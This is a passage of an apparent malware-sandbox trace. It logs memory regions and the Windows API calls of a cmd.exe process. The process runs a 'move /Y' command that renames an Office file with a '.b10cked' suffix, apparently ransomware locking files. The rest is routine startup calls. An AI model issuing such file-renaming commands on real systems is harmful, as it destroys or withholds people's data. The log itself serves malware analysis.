
0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20633 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 20634 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20635 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20636 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20637 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20638 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 20639 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20679 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20680 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20681 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20682 start_va = 0x440000 end_va = 0x44ffff entry_point = 
0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 20683 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 20684 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20685 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20686 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20687 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20688 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20689 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20690 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20691 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" 
(normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20692 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20693 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20694 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20695 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20696 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 20697 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 20698 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 20699 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 20700 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 20701 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 20702 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 314 os_tid = 0xec4 [0153.096] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef90c | out: 
lpSystemTimeAsFileTime=0x2ef90c*(dwLowDateTime=0x95302c80, dwHighDateTime=0x1d440a9)) [0153.096] GetCurrentProcessId () returned 0xe50 [0153.096] GetCurrentThreadId () returned 0xec4 [0153.096] GetTickCount () returned 0x2f2f5 [0153.096] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef904 | out: lpPerformanceCount=0x2ef904*=20988564172) returned 1 [0153.097] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.097] __set_app_type (_Type=0x1) [0153.097] __p__fmode () returned 0x76b331f4 [0153.097] __p__commode () returned 0x76b331fc [0153.097] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.098] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.098] GetCurrentThreadId () returned 0xec4 [0153.098] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xec4) returned 0x38 [0153.098] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.098] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.098] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.098] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef89c | out: phkResult=0x2ef89c*=0x0) returned 0x2 [0153.098] VirtualQuery (in: lpAddress=0x2ef8d3, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.098] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.098] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.098] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.099] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef86c, dwLength=0x1c | out: lpBuffer=0x2ef86c*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0153.099] GetConsoleOutputCP () returned 0x1b5 [0153.099] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.099] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.099] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.099] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.099] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.099] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.099] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.099] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.100] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.100] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.100] GetEnvironmentStringsW () returned 0x4f0210* [0153.100] FreeEnvironmentStringsW (penv=0x4f0210) returned 1 [0153.100] GetEnvironmentStringsW () returned 0x4f0210* [0153.100] FreeEnvironmentStringsW (penv=0x4f0210) returned 
1 [0153.100] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee80c | out: phkResult=0x2ee80c*=0x40) returned 0x0 [0153.100] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0xa0, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x0, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegCloseKey (hKey=0x40) returned 0x0 [0153.101] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee80c | out: phkResult=0x2ee80c*=0x40) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x40, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x1, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x0, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x9, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x4, lpData=0x2ee818*=0x9, lpcbData=0x2ee810*=0x4) returned 0x0 [0153.101] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee814, lpData=0x2ee818, lpcbData=0x2ee810*=0x1000 | out: lpType=0x2ee814*=0x0, lpData=0x2ee818*=0x9, lpcbData=0x2ee810*=0x1000) returned 0x2 [0153.102] RegCloseKey (hKey=0x40) returned 0x0 [0153.102] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637b [0153.102] srand (_Seed=0x5b88637b) [0153.102] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"" [0153.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"" [0153.102] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.102] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4f1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.102] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.102] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.103] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.103] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.103] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.103] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.103] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.103] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.103] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.103] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.103] SetEnvironmentVariableW (lpName="PROMPT", 
lpValue="$P$G") returned 1 [0153.103] GetEnvironmentStringsW () returned 0x4f2360* [0153.103] FreeEnvironmentStringsW (penv=0x4f2360) returned 1 [0153.103] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.103] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.103] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.103] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.103] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.103] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.103] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.103] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.103] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.103] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef5d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef5d8, lpFilePart=0x2ef5d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef5d4*="Desktop") returned 0x18 [0153.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.104] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef354 | out: lpFindFileData=0x2ef354) returned 0x4f09f0 [0153.104] FindClose (in: hFindFile=0x4f09f0 | out: hFindFile=0x4f09f0) returned 1 [0153.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef354 | out: lpFindFileData=0x2ef354) returned 0x4f09f0 [0153.104] FindClose (in: hFindFile=0x4f09f0 | out: hFindFile=0x4f09f0) returned 1 [0153.104] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 
lpFindFileData=0x2ef354 | out: lpFindFileData=0x2ef354) returned 0x4f09f0 [0153.104] FindClose (in: hFindFile=0x4f09f0 | out: hFindFile=0x4f09f0) returned 1 [0153.104] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.105] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.105] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.105] GetEnvironmentStringsW () returned 0x4f0210* [0153.105] FreeEnvironmentStringsW (penv=0x4f0210) returned 1 [0153.105] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.105] GetConsoleOutputCP () returned 0x1b5 [0153.108] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.108] GetUserDefaultLCID () returned 0x409 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef718, cchData=128 | out: lpLCData="0") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef718, cchData=128 | out: lpLCData="0") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef718, cchData=128 | out: lpLCData="1") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.108] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.109] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.109] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.110] GetConsoleTitleW (in: lpConsoleTitle=0x4e0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.110] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.110] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.110] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.112] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.112] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.112] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.112] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.112] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.112] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.112] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.120] GetConsoleTitleW (in: lpConsoleTitle=0x2ef410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.208] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.208] _wcsicmp (_String1="move", 
_String2="ERASE") returned 8 [0153.208] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.208] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.208] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.208] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.208] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.208] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.208] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.208] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.208] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.208] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.208] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.208] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.208] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.208] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.208] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.208] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.209] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.209] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.209] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.209] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.209] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.209] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.209] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.209] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.209] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.209] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.209] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.209] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.209] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.209] _wcsicmp 
(_String1="move", _String2="START") returned -6 [0153.209] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.209] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.209] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.211] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.211] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef1cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef1c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef1c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.211] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.212] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.212] _wcsnicmp (_String1="COPYCMD", 
